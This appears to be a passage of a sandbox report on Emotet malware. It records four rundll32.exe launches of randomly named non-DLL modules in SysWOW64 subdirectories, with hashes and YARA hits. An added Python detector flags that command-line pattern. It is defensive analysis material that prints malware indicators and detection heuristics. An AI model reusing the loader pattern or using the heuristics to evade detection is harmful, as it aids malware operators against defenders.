                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2116797461.0000000000241000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.2116722634.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:13:42:54
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2117982629.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000015.00000002.2118123404.0000000000201000.00000020.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:13:42:55
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2119357685.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.2119622142.0000000000221000.00000020.00000001.sdmp, Author: Joe Security

                                            General

                                            Start time:13:42:55
                                            Start date:07/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL
                                            Imagebase:0xa70000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2340256128.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.2340299348.0000000000231000.00000020.00000001.sdmp, Author: Joe Security

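The four rundll32.exe launches above share one image hash (MD5 51138BEEA3E2C21EC44D0932C71762A8, 44544 bytes), so the host binary itself is not the signal; what differs between a benign launch and these is the command line: a module with a non-DLL extension, sitting in a freshly created subdirectory of C:\Windows\SysWOW64, invoked through the generic export RunDLL, and repeated with a new random path every second or so. The following is an added detection example, not part of the Joe Sandbox report or any Joe Security tooling. It parses rundll32 command lines of the form `<image> <module>,<export>` and scores them; the four sample lines are taken from the records above, the benign lines and the KNOWN_SUBDIRS allowlist are constructed for illustration and would be tuned to a real environment.

```python
"""Flag rundll32.exe launches that look like the Emotet loader pattern seen above.

Heuristics (strong): module extension is not a DLL-type extension;
module lives in an unexpected subdirectory of System32/SysWOW64.
Heuristic (weak): the export is literally 'RunDLL'.
"""
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath

# Constructed sample set: the first four command lines are the rundll32
# launches recorded in the report; the remaining three are benign contrasts
# added here (they do not come from the report).
SAMPLE_CMDLINES = [
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL",
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",
    r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\tmp\x.bin",
    r"C:\Windows\System32\notepad.exe C:\Users\a\notes.txt",
]

# image path, then optionally quoted module path, comma, export name.
# Joe Sandbox renders the quoting with single quotes; real logs use double.
CMD_RE = re.compile(
    r"""^(?P<image>\S*rundll32\.exe)\s+      # rundll32 image path
        ['"]?(?P<module>[^'",]+)['"]?        # module path, optionally quoted
        \s*,\s*(?P<export>\w+)               # exported entry point
    """,
    re.IGNORECASE | re.VERBOSE,
)

DLL_LIKE_EXTENSIONS = {".dll", ".cpl", ".ocx", ".ax"}
# Lower-cased system directories with a trailing separator.
SYSTEM_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")
# Illustrative allowlist of legitimate subdirectories (assumption; tune per host).
KNOWN_SUBDIRS = {"drivers", "wbem", "windowspowershell\\v1.0"}

STRONG_REASONS = ("non-dll-extension", "unexpected-system-subdir")


@dataclass
class Verdict:
    cmdline: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # The generic export alone is too weak to alert on by itself.
        return any(r in STRONG_REASONS for r in self.reasons)


def analyze(cmdline: str) -> Verdict:
    """Return the reasons (if any) a rundll32 command line matches the pattern."""
    verdict = Verdict(cmdline)
    m = CMD_RE.match(cmdline.strip())
    if not m:
        return verdict  # not a rundll32 "<module>,<export>" launch
    module = PureWindowsPath(m.group("module").strip())
    export = m.group("export")

    if module.suffix.lower() not in DLL_LIKE_EXTENSIONS:
        verdict.reasons.append("non-dll-extension")

    parent = str(module.parent).lower()
    for sysdir in SYSTEM_DIRS:
        if parent.startswith(sysdir):
            sub = parent[len(sysdir):]
            if sub and sub not in KNOWN_SUBDIRS:
                verdict.reasons.append("unexpected-system-subdir")

    if export.lower() == "rundll":
        verdict.reasons.append("generic-export-RunDLL")
    return verdict


def scan(cmdlines):
    """Analyze many command lines and return only the suspicious verdicts."""
    return [v for v in map(analyze, cmdlines) if v.suspicious]


if __name__ == "__main__":
    for v in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(v.reasons):55} {v.cmdline}")
```

Run over an EDR or Sysmon event-1 feed, `scan` would surface all four launches from the report while passing the two legitimate shell32.dll invocations; the one-second cadence between launches (13:42:53 to 13:42:55) is a further correlation point a SIEM rule could add on top.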